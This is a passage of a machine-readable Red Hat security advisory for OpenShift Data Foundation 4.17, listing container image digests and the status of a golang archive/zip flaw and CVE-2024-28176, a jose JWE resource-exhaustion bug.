"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: archive/zip: Incorrect handling of certain ZIP files", }, { cve: "CVE-2024-28176", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-03-10T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2268820", }, ], notes: [ { category: "description", text: "Jose was found to have an uncontrolled resource consumption vulnerability. Under certain conditions, the user's environment can consume an unreasonable amount of CPU time or memory during JWE decryption operations, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "jose: resource exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", 